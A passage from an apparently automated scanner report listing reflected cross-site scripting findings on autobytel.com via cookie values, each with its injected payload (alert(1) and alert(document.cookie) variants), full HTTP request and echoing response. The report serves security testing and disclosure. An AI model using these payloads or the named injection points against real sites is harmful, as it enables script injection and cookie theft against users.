Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:32:13 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
bresearch|";

           //s.prop9 = "kbbresearch|Search Engine Optimization Project|13148";
           s.prop10 = "kbbresearch|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "3bbbd";alert(1)//71b5ba10f64||";

           s.prop14 = "research|kelley blue book|trade-in value|standalone interface|selectyear : Search Engine Optimization Project entry page";
           s.prop15 = "No Article|No Article";
           s.prop16
...[SNIP]...

4.2068. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 9794b<img%20src%3da%20onerror%3dalert(1)>df36346d341 was submitted in the PV_CT cookie. This input was echoed as 9794b<img src=a onerror=alert(1)>df36346d341 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/research/kbb/index.cfm/action/selectyear/valuetype/TI HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=29794b<img%20src%3da%20onerror%3dalert(1)>df36346d341; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 45242
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:30:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:30:41 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:30:41 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:30:41 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 29794b<img src=a onerror=alert(1)>df36346d341 cannot be converted to a number.
</h1>
...[SNIP]...

4.2069. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bd2a"%3balert(1)//999c0c1f693 was submitted in the BDATALIST cookie. This input was echoed as 3bd2a";alert(1)//999c0c1f693 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c43bd2a"%3balert(1)//999c0c1f693; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:25:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:25:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:25:21 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:21 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 34716

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c43bd2a";alert(1)//999c0c1f693";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4773AD7A-08D7-B896-73EA55F0
...[SNIP]...

4.2070. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7009a"%3balert(1)//52968e6c274 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 7009a";alert(1)//52968e6c274 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=7009a"%3balert(1)//52968e6c274; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:26:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:26:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:26:37 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:26:37 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 34716

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
oyota_Highlander";

           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "7009a";alert(1)//52968e6c274||";

           s.prop14 = "research|top 10|top10 : Search Engine Optimization Project entry page";
           s.prop15 = "No Article|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|
...[SNIP]...

4.2071. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 771ce<img%20src%3da%20onerror%3dalert(1)>7f34c2e9ef2 was submitted in the PV_CT cookie. This input was echoed as 771ce<img src=a onerror=alert(1)>7f34c2e9ef2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2771ce<img%20src%3da%20onerror%3dalert(1)>7f34c2e9ef2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 42450
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:25:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:25:50 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:25:49 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:49 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 2771ce<img src=a onerror=alert(1)>7f34c2e9ef2 cannot be converted to a number.
</h1>
...[SNIP]...

4.2072. http://www.autobytel.com/coupons/my-garage.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/coupons/my-garage.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 942f9"%3balert(1)//3060dbd7fa4 was submitted in the BDATALIST cookie. This input was echoed as 942f9";alert(1)//3060dbd7fa4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /coupons/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4942f9"%3balert(1)//3060dbd7fa4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:51:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:51:37 GMT
Content-Length: 22137
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:51:36 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4942f9";alert(1)//3060dbd7fa4";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4863F801-A43C-E980-57F6CC81
...[SNIP]...

4.2073. http://www.autobytel.com/coupons/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/coupons/my-garage.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f0e7"%3balert(1)//bf390352214 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 5f0e7";alert(1)//bf390352214 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /coupons/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=5f0e7"%3balert(1)//bf390352214; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:17 GMT
Content-Length: 22137
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:17 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
s.prop6 = "";
           //s.prop7 = "|";

           //s.prop9 = "|Search Engine Optimization Project|13148";
           s.prop10 = "|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "5f0e7";alert(1)//bf390352214||";

           s.prop14 = "my garage page|coupons : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "||||||Search Engin
...[SNIP]...

4.2074. http://www.autobytel.com/diagnose-problem/my-garage.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/diagnose-problem/my-garage.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf94b"%3balert(1)//da95038b8f8 was submitted in the BDATALIST cookie. This input was echoed as bf94b";alert(1)//da95038b8f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /diagnose-problem/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4bf94b"%3balert(1)//da95038b8f8; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:49:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:49:09 GMT
Content-Length: 22181
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:49:08 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4bf94b";alert(1)//da95038b8f8";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "484D7627-C7C5-A510-72DE5B68
...[SNIP]...

4.2075. http://www.autobytel.com/diagnose-problem/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/diagnose-problem/my-garage.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75850"%3balert(1)//c65df28989b was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 75850";alert(1)//c65df28989b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /diagnose-problem/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=75850"%3balert(1)//c65df28989b; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:00 GMT
Content-Length: 22206
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=75850;expires=Wed, 16-Jan-2041 23:53:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
s.prop6 = "";
           //s.prop7 = "|";

           //s.prop9 = "|Search Engine Optimization Project|13148";
           s.prop10 = "|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "75850";alert(1)//c65df28989b||";

           s.prop14 = "my garage page|diagnose-problem : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "||||||Sea
...[SNIP]...

4.2076. http://www.autobytel.com/my-garage.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/my-garage.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0ab7"%3balert(1)//ee2e0060c44 was submitted in the BDATALIST cookie. This input was echoed as b0ab7";alert(1)//ee2e0060c44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4b0ab7"%3balert(1)//ee2e0060c44; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:37 GMT
Content-Length: 22059
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:37 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4b0ab7";alert(1)//ee2e0060c44";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4848B300-A6C5-3A65-E14CF5DB
...[SNIP]...

4.2077. http://www.autobytel.com/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/my-garage.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 645a6"%3balert(1)//14be9289b7 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 645a6";alert(1)//14be9289b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
